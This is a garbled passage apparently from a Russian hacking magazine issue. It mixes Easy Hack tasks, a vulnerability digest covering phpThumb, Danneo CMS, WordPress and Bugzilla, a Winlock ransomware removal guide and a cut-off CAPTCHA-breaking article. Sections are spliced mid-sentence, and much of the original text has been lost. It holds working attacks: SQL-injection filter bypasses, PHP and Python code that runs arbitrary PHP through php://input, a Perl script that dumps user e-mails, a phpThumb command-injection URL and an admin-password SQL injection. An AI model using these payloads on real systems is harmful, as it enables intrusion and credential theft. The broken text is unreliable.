[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@="\"%1\" %*"

,
.
Another trick stops one particular program (regedit.exe, say) from starting: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options. A subkey named after the executable with a Debugger value makes Windows launch the "debugger" whenever that program is started, and the malware registers itself there. Delete the subkey:
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /f

INFO
A tool can also be blocked through Software Restriction Policies: look for path rules under HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths (ProcessExplorer is a favourite target) and remove the ones that name your tools.
The Task Manager is disabled by the DisableTaskMgr policy value. A .reg file that puts it back:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
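An added example, not from the article: a small Python checker that reads a `reg export` dump and flags the settings discussed above (a hijacked Userinit or Shell, Image File Execution Options debuggers, the DisableTaskMgr/DisableRegistryTools/DisableRegedit policies and a changed exefile handler). The sample export is constructed for the example; on a real machine export the keys with reg export from a LiveCD or a clean boot and feed the file in.

```python
# Constructed sample (assumption, not from the article): a fragment of `reg export`
# output from a machine with the kind of changes Trojan.Winlock makes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\svchost.exe"
"Shell"="explorer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="C:\\WINDOWS\\Temp\\lock.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\WINDOWS\\Temp\\lock.exe\" \"%1\" %*"
"""

WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
IFEO = r"hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options"
POLICY_KEYS = (r"hkey_current_user\software\microsoft\windows\currentversion\policies\system",
               r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system")
EXEFILE_KEYS = (r"hkey_classes_root\exefile\shell\open\command",
                r"hkey_classes_root\exefile\shell\runas\command")


def _decode(raw):
    """Decode a .reg value: "string" (with \\ and \" escapes) or dword:hex."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    return raw


def parse_reg(text):
    """Minimal .reg parser: {key (lower-cased): {value name: decoded value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and (line.startswith('"') or line.startswith("@")):
            name, _, raw = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            keys[current][name] = _decode(raw)
    return keys


def audit(keys):
    """Return the Winlock-style persistence and lock-out settings found in the dump."""
    findings = []
    wl = keys.get(WINLOGON, {})
    # Userinit must be a single entry ending in userinit.exe (a trailing comma is normal).
    userinit = [p.strip() for p in wl.get("Userinit", "").split(",") if p.strip()]
    if len(userinit) != 1 or not userinit[0].lower().endswith("\\userinit.exe"):
        findings.append(f"Winlogon\\Userinit hijacked: {wl.get('Userinit')!r}")
    if wl.get("Shell", "explorer.exe").lower() != "explorer.exe":
        findings.append(f"Winlogon\\Shell replaced: {wl['Shell']!r}")
    # Any Debugger value under Image File Execution Options redirects that program.
    for key, values in keys.items():
        if key.startswith(IFEO + "\\") and "Debugger" in values:
            image = key.rsplit("\\", 1)[-1]
            findings.append(f"IFEO Debugger for {image}: {values['Debugger']!r}")
    for key in POLICY_KEYS:
        for name in ("DisableTaskMgr", "DisableRegistryTools", "DisableRegedit"):
            if keys.get(key, {}).get(name) == 1:
                findings.append(f"{name}=1 under {key}")
    # The exefile handler must be exactly "%1" %*; anything else runs every .exe through it.
    for key in EXEFILE_KEYS:
        cmd = keys.get(key, {}).get("(Default)")
        if cmd is not None and cmd != '"%1" %*':
            findings.append(f"exefile handler changed: {cmd!r}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(finding)
```

Each finding maps to one of the reg add / REG DELETE / .reg fixes above; the checker only reports, it changes nothing.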
-


.
,
, . popup
SMS . ,
,
Internex Explore
Firefox'. ,
, . Internet Explorer
>
> ,
Firefox'
> .z



Spyder spyder@antichat.net
Cr@wler crawler@xakep.ru

Easy Hack
1

TASK: BYPASS A SQL-INJECTION FILTER

SOLUTION:
Many filters reject the usual separators: a space, "+", "%20" or the "/**/" comment. For MySQL any of the following URL-encoded whitespace characters separates keywords just as well:

%09  horizontal tab
%0A  line feed (NL)
%0B  vertical tab
%0C  form feed (NP)
%0D  carriage return

Example:
id=-1%0Aunion%0Aselect%0A1

Suppose the script checks the parameter like this (the filter we are bypassing, with its syntax fixed):

<?php
if (isset($_GET['id']) && $_GET['id'] != '') {
    if (strstr($_GET['id'], " "))    { die("HACK ALERT"); }
    if (strstr($_GET['id'], "/**/")) { die("HACK ALERT"); }
    if (strstr($_GET['id'], "+"))    { die("HACK ALERT"); }
    if (strstr($_GET['id'], "%20"))  { die("HACK ALERT"); }
    // ... $_GET['id'] then goes into the query
}

It rejects a space, /**/, + and %20 in $_GET['id'] and nothing else, so a query with other separators sails through. Besides the whitespace substitutes there are two more MySQL-specific tricks.
1. The whitespace characters listed above (the filter does not even notice them ;)).

TASK: A QUICK OPENVPN SERVER

SOLUTION:
Suppose you have a root shell on a box (whoami says root :)) and want a VPN server on it.
1. Check that the tun/tap driver is there. The kernel module is tun (it provides both tun and tap devices): modprobe tun && lsmod | grep tun
2. Check whether the LZO library is installed, since OpenVPN uses it for compression: locate lzo.so
3. If it is missing, build it from source; on most Linux distributions the standard ./configure, make, make install is all it takes (the same goes for OpenVPN itself).
tar xzvf lzo.tgz
cd lzo
./configure


2. MySQL executes the contents of "executable comments" /*! ... */, which other servers treat as ordinary comments:
select id/*!,title*/ from news

returns both id and title from news. So the comment itself can serve as the separator:
id=-1/*!union*/select/*!version()*/

Finally, parentheses also separate tokens, so the query can be written without any whitespace at all:
id=(-1)union(select(version()))
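To see the three bypasses side by side, here is an added Python example (not the article's code). It mirrors the PHP check above, then shows a detection that first normalizes the value the way MySQL reads it before looking for UNION ... SELECT; the payloads are the article's. The real fix remains parameterized queries; the normalizing check only shows why a token blacklist on the raw string cannot work.

```python
import re
from urllib.parse import unquote

# Tokens the article's PHP check rejects in the raw $_GET['id'].
BLOCKED = (" ", "/**/", "+", "%20")

WHITESPACE = re.compile(r"[ \t\n\x0b\x0c\r]+")   # %20 %09 %0A %0B %0C %0D


def naive_filter_allows(raw_id):
    """Mirror of the strstr() checks: True if the value gets through."""
    return not any(token in raw_id for token in BLOCKED)


def normalize(raw_id):
    """Approximate what MySQL parses: URL-decode, keep the body of /*!...*/,
    drop ordinary /*...*/ comments, treat every whitespace character and
    parentheses as token separators, collapse and lower-case."""
    sql = unquote(raw_id)
    sql = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", sql, flags=re.S)  # executable comments keep their body
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)              # ordinary comments vanish
    sql = re.sub(r"[()]", " ", sql)
    return WHITESPACE.sub(" ", sql).strip().lower()


def union_select_after_normalizing(raw_id):
    """Detection that looks at the normalized form instead of the raw bytes."""
    return re.search(r"\bunion\b.*\bselect\b", normalize(raw_id)) is not None


# The article's three bypasses plus the classic form the filter does catch.
PAYLOADS = {
    "newline":   "-1%0Aunion%0Aselect%0A1",
    "versioned": "-1/*!union*/select/*!version()*/",
    "parens":    "(-1)union(select(version()))",
    "plain":     "-1 union select 1",
}


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:10} naive filter allows: {naive_filter_allows(payload)!s:5} "
              f"normalized: {normalize(payload)!r}")
```

All three bypasses pass the naive filter and all three normalize to the same "-1 union select ..." shape; the only thing the original filter blocks is the literal space variant.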

make
make install

4. With lzo in place, build OpenVPN the same way; its configure script picks the LZO library up:
tar xzvf vpn.tgz
cd vpn
./configure
make
make install

5. Generate the certificates. Copy the easy-rsa directory from the OpenVPN source tree into /etc/openvpn/ (sample-config-files is worth copying too) and run, inside /etc/openvpn/easy-rsa:
. ./vars                     (load the variables; note the leading dot, the script must be sourced)
./clean-all                  (empty the keys directory)
./build-ca                   (create the CA)
./build-key-server server    (server X.509 certificate)
./build-key-pkcs12 client    (client X.509 certificate, packed as PKCS#12)

Answer the Common Name prompt with a different name each time: client for the client, server for the server.
6. Generate the Diffie-Hellman parameters:
./build-dh

7. Create the server configuration:
touch /etc/openvpn/server.conf

with these contents:

port 443
proto tcp
dev tap
cipher DES-EDE3-CBC
reneg-sec 60
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh2048.pem
server 10.10.200.0 255.255.255.0
client-config-dir ccd
push "dhcp-option DNS 222.222.222.222"
push "dhcp-option DNS 22.22.222.222"
push "redirect-gateway"
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 0

The DNS addresses are placeholders. DES-EDE3-CBC is 3DES; when both ends are yours, cipher AES-256-CBC is the better choice, and it must be set identically on the client. verb 0 keeps the log quiet.

8. Enable IP forwarding and NAT the VPN subnet with iptables:

TASK: CODE EXECUTION THROUGH A PHP INCLUDE

SOLUTION:
Back in 2004 SecurityLab described a file inclusion technique built on the php://input wrapper. It still works wherever a script does something like:
<?php
if(isset($_GET['page'])) {include($_GET['page']);}

Pass page=php://input: http://www.example.com/index.php?page=php://input. The wrapper returns the raw body of the request, so whatever you POST is what include() executes. One caveat: on PHP 5.2 and later php://input is governed by allow_url_include, which is off by default, so the trick needs that setting on. The raw request starts like this:
POST /index.php?page=php://input HTTP/1.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X 04 /135/ 10

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.10.200.0/24 -j SNAT --to 127.0.0.1

where 127.0.0.1 stands for the external IP address of the VPN server.

9. Copy sample-scripts/openvpn.init from the OpenVPN source tree into /etc/init.d/ (the article names it init) and start the service:
/etc/init.d/init start

10. Done, the server is running :). OpenVPN clients exist for every major platform; point one at port 443/tcp of the server with the client certificate from step 5.

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: www.example.com
Connection: Keep-Alive
Cache-Control: no-cache

<?php phpinfo() ?>

The server answers with the phpinfo() output.
2. A small PHP script automates it:
<?php
if (isset($_GET['cmd']) && isset($_GET['host']) && isset($_GET['script'])) {
    $host   = stripslashes($_GET['host']);
    $script = stripslashes($_GET['script']);
    $port   = isset($_GET['port']) ? (int) $_GET['port'] : 80;   // the original left $port undefined
    $cmd    = htmlspecialchars_decode(stripslashes($_GET['cmd']));
    $cmd    = '<?php ' . $cmd . ' ?>';
    // $script already ends in "?page=", so the wrapper name is appended directly
    $request  = "POST /" . $script . "php://input" . " HTTP/1.1\r\n";
    $request .= "Accept-Language: en\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
    $request .= "Host: " . $host . "\r\n";
    $request .= "Content-Length: " . strlen($cmd) . "\r\n";
    // Connection: close, not Keep-Alive: otherwise the feof() loop below waits for the server's timeout
    $request .= "Connection: close\r\n";
    $request .= "Cache-Control: no-cache\r\n";
    $request .= "\r\n";
    $request .= $cmd;
    $socket = fsockopen($host, $port);
    if (!$socket) { die("connect failed"); }
    fputs($socket, $request);

TASK: DUMP A TABLE THROUGH A SQL INJECTION

SOLUTION:
Pulling rows out one by one by hand is tedious; a short Perl script does it. It walks a UNION SELECT with LIMIT $lim,1 and cuts each value out of the page between two markers:
#!/usr/bin/perl
use LWP::Simple;        # LWP::Simple gives us get() for HTTP
open(FH, ">dump.txt");  # the dump goes here
$lim = 0;               # offset for LIMIT
while (1) {
    $url = "http://www.example.com/profile.php?id=-1+union+select+concat('c0de',email,'ed0c')+from+users+limit+$lim,1";
    # the injected SELECT returns one e-mail per request, wrapped in the c0de ... ed0c markers
    $content = get($url);                # fetch the page
    if ($content =~ m/c0de(.*)ed0c/) {   # found a marked value?
TASK: FIND A WRITABLE DIRECTORY

SOLUTION:
You have a web shell (r57, c99 or the like) and need somewhere to write. The basic query:
find . -perm -2 -type d -ls

lists the directories below the current one that are writable by everyone. The variants further on narrow the search down by owner, group and permission bits.

TASK: FIND WHERE PHP KEEPS ITS SESSIONS

SOLUTION:
Useful when you want to plant PHP code in a session file and include it, or read somebody else's session. Sessions usually live in /tmp, but not always.
1. Look at phpinfo(). session.save_handler = files means sessions are stored as files, and session.save_path is the directory. The Local Value column is what applies to this virtual host (it can be overridden in .htaccess); the


    while (!feof($socket)) echo fgets($socket, 1024);   // print whatever the server sends back
    fclose($socket);
}
?>

3. Call it like this:
http://localhost/input.php?host=www.example.com&script=index.php?page=&cmd=phpinfo()

4. Enjoy the output :).
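An added Python version of the request (not the article's script), for when PHP is not at hand: build_request() produces the raw POST whose body is PHP code with a correct Content-Length, parse_response() splits the answer, and run_php() does the round trip over a socket. Host, path and command are parameters; the sample values are the article's example.com ones.

```python
import socket


def build_request(host, path, php_code, port=80):
    """Raw HTTP/1.1 POST for a page doing include($_GET['page']) with
    page=php://input: the request body is what gets included, so it is PHP."""
    body = f"<?php {php_code} ?>".encode()
    host_header = host if port == 80 else f"{host}:{port}"
    head = "\r\n".join([
        f"POST {path} HTTP/1.1",
        f"Host: {host_header}",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        # Connection: close, not Keep-Alive: with Keep-Alive the read loop in
        # run_php() (like the article's feof() loop) waits for the server timeout.
        "Connection: close",
        "", "",
    ]).encode()
    return head + body


def parse_response(raw):
    """Split a raw HTTP response into (status line, headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def run_php(host, path, php_code, port=80, timeout=10):
    """Send the request and return (status line, body). Network call, not exercised by the test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path, php_code, port))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    status, _, body = parse_response(b"".join(chunks))
    return status, body


if __name__ == "__main__":
    # Constructed call against the article's placeholder host; prints the raw request only.
    print(build_request("www.example.com", "/index.php?page=php://input", "phpinfo();").decode())
```

If the target answers with the unmodified page instead of the phpinfo() table, allow_url_include is most likely off and php://input is not being opened by include().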

        print FH $1 . "\n";            # write the e-mail to the dump
        $lim++;                        # next row
    } else {
        print "Total dumped $lim\n";   # no more rows
        exit;
    }
}

Careful: the output can be long, so redirect it to a file and grep that instead of scrolling.
find . -user www -type d -ls            directories owned by user www
find . -user www -perm /222 -type d -ls  directories owned by www with any write bit set
find . -group www -type d -ls           directories whose group is www
find . -perm -a+w -type d -ls           directories writable by owner, group and others (drwxrwxrwx)
find . -perm -2 -type d -ls             directories where "others" have w (e.g. dr-xr-xrwx), the basic query above

Master Value column is the php.ini default.
2. If .htaccess sets php_value session.save_path, that value wins over php.ini.
3. If phpinfo() is not available, try the usual locations:
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3/
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php4/session/
/var/lib/php5/
/var/lib/php5/session/
/var/lib/php6/

TASK: FIND HTTPD.CONF

SOLUTION:
The path to the Apache configuration is set in the init script, so that is where to look first: /etc/init.d/apache2 (or similar) is a bash script, and the interesting lines are:
pname=apache2
: ${sysconfdir:=/etc/$pname}
: ${apache_link:=/usr/sbin/httpd2}
: ${sysconfig_apache:=/etc/sysconfig/$pname}
TASK: REMOVE A WINLOCK (SMS RANSOM) BLOCKER

SOLUTION:
The blocker sits in the usual autostart places and covers the desktop until a code bought with a paid SMS (typically 300-600 roubles) is entered. It is ordinary malware, so do not pay; the steps:
1. First try the free unlock-code services (support.kaspersky.ru/viruses/deblocker and the others listed earlier in this issue). If no code fits, look for the malware body: it usually lands in a temp directory, c:\windows\temp, the user's Temp, Sandboxie's folders and Temporary Internet Files under c:\documents and settings\<user>\Local Settings :), and a copy often survives in System Volume Information (the system restore store), so clean that too.
2. Boot a LiveCD with an antivirus (freedrweb.

/var/lib/php6/session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\sessiondata

(Or simply read session.save_path off phpinfo().)

: ${pidfile:=/var/run/httpd2.pid}
: ${logdir:=/var/log/$pname}
httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}

so here the configuration is /etc/apache2/httpd.conf. When the init script is not readable, the package files or the messages log usually name it, and two more shortcuts are:
locate httpd.conf
and the Apache section of phpinfo(), which shows the server root.

com/livecd), set the BIOS to boot from CD and scan the disk from there. A Windows-based live environment with CureIt! (ERD Commander, an Explorer, etc.) does the job as well.
3. Alternatively run a scan with the free Dr.Web CureIt! (freedrweb.com/cureit).
4. If the Task Manager stays disabled afterwards, re-enable it: <Win+R>, gpedit.msc, User Configuration -> Administrative Templates -> System -> Ctrl+Alt+Del Options -> Remove Task Manager, set it to Not configured, Ok. Or start regedit.exe and delete the DisableTaskMgr value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
5. If .exe files no longer start, restore the (Default) value of
HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
to "%1" %*.
Afterwards update Windows (wuauclt.exe /detectnow forces a check) and the antivirus. If something still looks odd, a LiveCD scan or uploading the suspicious files to virustotal.com settles it. z



icq 884888, http://snipper.ru

Greetings! This month's digest: a lock-screen bypass in gnome-screensaver, command execution in phpThumb, SQL injection in Danneo CMS, a trashed-post leak in WordPress and exposed directories in Bugzilla.

01  GNOME-SCREENSAVER LOCK BYPASS

BRIEF. gnome-screensaver is the screen locker of the GNOME desktop (openSUSE ships it, for one). Versions up to and including 2.28.2 can be made to drop the lock window, which leaves the unlocked session to whoever is at the keyboard.
The cause is in the repainting of the lock window (the gdk_window_begin_implicit_paint() path in GTK+): redrawn at the wrong moment, it uncovers the desktop :)

EXPLOIT. The four-step recipe is published on vigilance.fr; it ends with pressing Enter at the lock screen, after which the dialog is repainted incorrectly and the desktop becomes usable.
TARGETS gnome-screensaver <= 2.28.2
SOLUTION Update to 2.28.3 from live.gnome.org/GnomeScreensaver/.

02  PHPTHUMB COMMAND EXECUTION

BRIEF. phpThumb (phpthumb.sourceforge.net/) is a PHP thumbnail library used by many projects (Plogger and TinyEditor among them); it handles GIF, JPEG, PNG, BMP and ICO. It works through the GD extension or, when available, ImageMagick, which on *nix it runs through the shell with whichever of passthru, system, shell_exec or exec is allowed. ImageMagick is preferred over GD when both are present. The helper in ./phpthumb.functions.php:

function SafeExec($command) {
    $AllowedExecFunctions = array('shell_exec'=>true, 'passthru'=>true, 'system'=>true, 'exec'=>true);
    foreach ($AllowedExecFunctions as $execfunction => $is_allowed) {
        switch ($execfunction) {
            case 'passthru':
            case 'system':
                ob_start();
                $execfunction($command);
                $returnvalue = ob_get_contents();
                ob_end_clean();
                break;
            case 'exec':
                $output = array();
                $lastline = $execfunction($command, $output);
                $returnvalue = implode("\n", $output);
                break;
            case 'shell_exec':
                ob_start();
                $returnvalue = $execfunction($command);
                ob_end_clean();
                break;
        }
        return $returnvalue;
    }
    return false;
}


The function tries the exec-style PHP functions one after another, so it only fails when the administrator has disabled all of them in disable_functions (in practice usually none, or just passthru). That matters because phpThumb feeds user-controlled filter parameters into the command line. The relevant part of phpthumb.class.php:
function ImageMagickThumbnailToGD() {
    ...
    foreach ($this->fltr as $filterkey => $filtercommand) {
        @list($command, $parameter) = explode('|', $filtercommand, 2);
        // each filter is turned into an ImageMagick switch
        switch ($command) {
            ...
            case 'blur':
                if ($this->ImageMagickSwitchAvailable('blur')) {
                    @list($radius) = explode('|', $parameter);
                    $radius = ($radius ? $radius : 1);
                    $commandline .= ' -blur '.$radius;
                    unset($this->fltr[$filterkey]);
                }
                break;
            ...
        }
    }
    ...
    $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
    $IMresult = phpthumb_functions::SafeExec($commandline);
    ...
    $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);


Follow $radius: it is taken verbatim from the request, appended to $commandline and run by SafeExec(), and the DebugMessage() calls print both the command and its output when debugging is on. A blur filter is requested with:
site.com/phpThumb.php?fltr[]=blur|5

and the debug output (levels 1 to 9, we want the most verbose) with:
http://site.com/phpThumb.php?phpThumbDebug=9

Put the two together and you get command execution on the server plus a view of the result, all inside phpThumb's own debug page.
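An added example (not phpThumb's code): the vulnerable construction of the ImageMagick command line in Python next to a hardened version. The vulnerable function reproduces the string concatenation above; the hardened one validates the radius against ImageMagick's geometry grammar and returns an argv list for subprocess.run() with no shell in between. The payload string has the shape the article's exploit uses, with `id` standing in for the injected command.

```python
import re


def imagemagick_command_vulnerable(src, fltr):
    """phpThumb <= 1.7.9 logic: the radius from fltr[]=blur|<radius> is appended to
    the shell command line unquoted and then handed to SafeExec()."""
    commandline = f"convert {src}"
    for filtercommand in fltr:
        command, _, parameter = filtercommand.partition("|")
        if command == "blur":
            radius = parameter.split("|")[0] or "1"
            commandline += f" -blur {radius}"
    return commandline


# ImageMagick blur geometry: radius or radiusxsigma, decimals allowed.
RADIUS = re.compile(r"\d+(?:\.\d+)?(?:x\d+(?:\.\d+)?)?")


def imagemagick_argv_hardened(src, fltr):
    """Same feature with two fixes: the radius must match the geometry grammar, and the
    result is an argv list (run with subprocess.run(argv)), so there is no shell to inject into."""
    argv = ["convert", src]
    for filtercommand in fltr:
        command, _, parameter = filtercommand.partition("|")
        if command == "blur":
            radius = parameter.split("|")[0] or "1"
            if not RADIUS.fullmatch(radius):
                raise ValueError(f"rejected blur radius {radius!r}")
            argv += ["-blur", radius]
    return argv


# The article's payload shape: a valid radius, extra options, then ';' to start a new shell command.
INJECTED = "blur|5 -quality 75 ; id ;"


if __name__ == "__main__":
    print(imagemagick_command_vulnerable("/tmp/x.jpg", [INJECTED]))
    try:
        imagemagick_argv_hardened("/tmp/x.jpg", [INJECTED])
    except ValueError as err:
        print("hardened:", err)
```

Quoting the radius with escapeshellarg() would also stop the injection, but validating the value and avoiding the shell altogether removes the whole class of bug rather than this one instance.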

EXPLOIT. The command runs with the web server's rights and its output comes back in the debug page, so the whole attack is one GET. On *nix:
http://site.com/phpThumb_1.7.9/phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line /home/site.com/public_html/kartinka.jpg" jpeg:"/home/site.com/public_html/kartinka.jpg" ; [_] ;&phpThumbDebug=9

where [_] is the shell command to run. A Windows variant and a ready-made exploit: http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit.

TARGETS phpThumb <= 1.7.9

SOLUTION Until a fixed release appears, make phpThumb use GD instead of ImageMagick in its configuration:
$PHPTHUMB_CONFIG['prefer_imagemagick'] = false;

and list the exec-style functions in PHP's disable_functions.

03  DANNEO CMS <= 0.5.2 SQL INJECTION

BRIEF. Danneo is a free CMS with the usual feature set: SEO-friendly URLs, templates, polls, comments and so on. The Inj3ct0r team (the successor of milw0rm.com) published a SQL injection in it; let us see why it works.
The vulnerable code is in ./mod/poll/comment.php:
$comtext = ($setting['peditor']=="yes") ? commentparse($comtext) : deltags(commentparse($comtext));
$comname = (preparse($usermain['logged'],THIS_INT)==1 && preparse($usermain['userid'],THIS_INT)>0) ? $usermain['uname'] : substr(deltags($comname),0,50);
$comtitle = substr(deltags($comtitle),0,255);
$in = $db->query("INSERT INTO ".$basepref."_polling_comment VALUES (NULL,'".$id."','".$usermain['userid']."','".NEWTIME."','$comname','$comtitle','$comtext','".REMOTE_ADDRS."')");

Notice that $comtitle is cut to 255 characters after deltags() has escaped quotes (\' and \"), and $comtext goes into the query right after it. A title of 254 characters plus a quote becomes 254 characters plus \' (256 characters), and substr() cuts that to 254 characters plus a lone backslash, which escapes the closing quote of the title literal; from there on the query is controlled through $comtext.
Danneo does have an input filter, ./base/danneo.track.php:
$baddata = array("UNION", "OUTFILE", "FROM", "SELECT", "WHERE", "SHUTDOWN", "UPDATE", "DELETE", "CHANGE", "MODIFY", "RENAME", "RELOAD", "ALTER", "GRANT", "DROP", "INSERT", "CONCAT", "cmd", "exec", "--");
foreach($_REQUEST as $params => $inputdata){
    foreach($baddata as $badkey => $badvalue){
        if(is_string($inputdata) && eregi($badvalue,$inputdata)){ $badcount=1; }
    }
}

Regular ][ readers will remember the classic: the ereg family is not binary-safe, so a NUL byte in $comtext hides everything after it from eregi() while MySQL still sees the whole string. One more detail, from ./base/danneo.function.php:
if(!ini_get("register_globals") || (@get_cfg_var('register_globals')==1)){
    //@import_request_variables('GPC');
    @extract($_COOKIE,EXTR_SKIP);
    @extract($_POST,EXTR_SKIP);
    @extract($_GET,EXTR_SKIP);
    @extract($_REQUEST,EXTR_SKIP);
}
if(get_magic_quotes_gpc()) {
    if($_POST) $_POST = stripslashesall($_POST);
    if($_GET) $_GET = stripslashesall($_GET);
    if($_REQUEST) $_REQUEST = stripslashesall($_REQUEST);
    if($_COOKIE) $_COOKIE = stripslashesall($_COOKIE);
}

With magic_quotes on, stripslashesall() strips the slashes again, so only deltags() stands between $comtitle/$comtext and the SQL string, and the injection works either way :)

EXPLOIT :
1. $comname , 5-10 ;
2. $comtitle 254 ( magic_
quotes = off, \");
3. $comtext /*[NULL BYTE]*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- POST- :
comname=lololo&comtitle=[254 ]'&comtext=/*\
x00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)--&id=[ID ]&ajax=0&re=comment

, SQL-
:

INSERT INTO dn052_polling_comment VALUES (NULL,'1','0',


'1230987393','lololo','[254 ]\','/*\0*/, (SELECT
adpwd FROM dn052_admin LIMIT 1), 1)-- -','127.0.0.1')

.
http://www.inj3ct0r.com/exploits/11004.

TARGETS Danneo CMS <= 0.5.2


SOLUTION
, Danneo
CMS http://danneo.com/down/view/CMS.html.

04


WORDPRESS

BRIEF ,
, WordPress,
.
, 2.9 (trash) . , - ,
, ,
,
.
, , ,
.
./wp-includes/query.php, , publish:
if ( ('publish' != $status) ) {
    if ( ! is_user_logged_in() ) {
        // User must be logged in to view unpublished posts.
        $this->posts = array();
    } else {
        if (in_array($status, array('draft', 'pending'))) {

, :
1. ;
2. draft pending,
trash .

EXPLOIT , ,
trash- advisory http://tmacuk.co.uk/?p=180.
TARGETS WordPress 2.9, 2.9.1

SOLUTION ,
http://wordpress.org/download.

05

BUGZILLA

BRIEF
Bugzilla -, (,
https://bugzilla.mozilla.org).
,

.
,
.htaccess, ,
,
.
process_bug.cgi ( 249 ):
foreach my $group (@{$bug->product_obj->groups_valid})

, $bug->product_obj"
,
,
,
. , ,
, .

EXPLOIT
:
1. CVS/,
contrib/, docs/en/xml/, t/" old-params.txt,
;
2. ,
,
( ),
.
advisory
bugzilla.org/security/3.0.10.
TARGETS
: Bugzilla < 3.0.11, < 3.2.6, < 3.4.5, <3.5.3
: Bugzilla 3.3.1 3.4.4 3.5.1, 3.5.2
SOLUTION Bugzilla
: http://www.bugzilla.org/download (
.htaccess

). z



primat.isu@gmail.com

,


xakep.ru,

,



.
2.0
,
.

,
,
. CAPTCHA Completely Automated Public Turing test
to tell Computers and Humans Apart.


.

, . ,
,
. -,
, ,
(
LiveJournal). .
, , . ,
,
, ,
30
90%, .
1000 $1, .
, , ,
( -), , , .

,
.
, -
.
,
. ,
.
,
, , . ,
. PageRank ,
, ,
.

,
, , .
,
-. , 1%, ,
100 .

. , 6 ,
(10 + 26) ^ 6 2
., .
, ,
, , , 10 .
,

. ( ?),
. ,

.
: , .
,
,
. ,
,

. ,
,
. ,

4 (16x24 )


, .
,
- . ,
, . - .

, , . xakep.ru,

. , 10000
, .
, , , .

: , ,
, . ,
, .
,
, -, , -,
.
5% . , 20-
.


. .

. , 100 .
,
,
,
.
, . ,
, ,
(,
2716.jpg). , PHP Python,
Matlab,
. PHP,
image, imagecolorat. , ,
,
:
class Xakep_CAPTCHA
{
    // Euclidean distance between two colors packed as 0xRRGGBB integers
    protected function colordist($color1, $color2)
    {
        return sqrt(pow((($color1 >> 16) & 0xFF) - (($color2 >> 16) & 0xFF), 2)
            + pow((($color1 >> 8) & 0xFF) - (($color2 >> 8) & 0xFF), 2)
